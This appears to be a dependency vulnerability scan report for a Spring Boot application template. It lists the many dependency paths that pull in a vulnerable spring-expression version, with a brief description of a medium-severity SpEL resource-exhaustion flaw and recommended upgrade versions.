  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22

Overview

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via a crafted SpEL expression.

Remediation

Upgrade org.springframework:spring-expression to version 5.2.23.RELEASE, 5.3.26, 6.0.7 or higher.

References

medium severity

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: org.springframework:spring-expression
  • Introduced through: org.springframework.hateoas:spring-hateoas@1.5.1, org.springframework.boot:spring-boot-starter-security@2.7.3 and others

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.hateoas:spring-hateoas@2.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-webmvc@5.3.22 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.hateoas:spring-hateoas@2.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-devtools@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-devtools@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework:spring-context-support@5.3.22 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework:spring-context-support@5.3.22 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-webmvc@5.3.22 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-devtools@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-devtools@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot-actuator@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
